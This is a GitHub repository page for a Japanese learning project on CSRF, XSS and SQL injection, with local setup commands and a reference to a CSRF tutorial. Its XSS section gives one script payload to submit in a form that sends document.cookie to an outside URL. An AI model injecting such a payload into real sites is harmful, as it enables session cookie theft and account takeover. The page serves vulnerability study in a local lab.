Skip to content

chida09/csrf-xss-sqlinjection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

起動

npx nodemon index.js
dc up -d
dc exec mysql /bin/bash 
mysql -uroot -ptest
use test;
show tables;
select * from users;

+-------------------+
| Tables_in_test_db |
+-------------------+
| users             |
+-------------------+

dc down --volumes

XSS

以下をフォームに入れて送信する

<script type='text/javascript'>document.location='https://www.google.com?cookie=' + document.cookie;</script>

認証方法

Session Authentication

参考

GoogleDoc 脆弱なサイトと罠サイトを実際に作って学ぶ『CSRF』とその対策 ホワイトハッカーへの道 三歩目

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published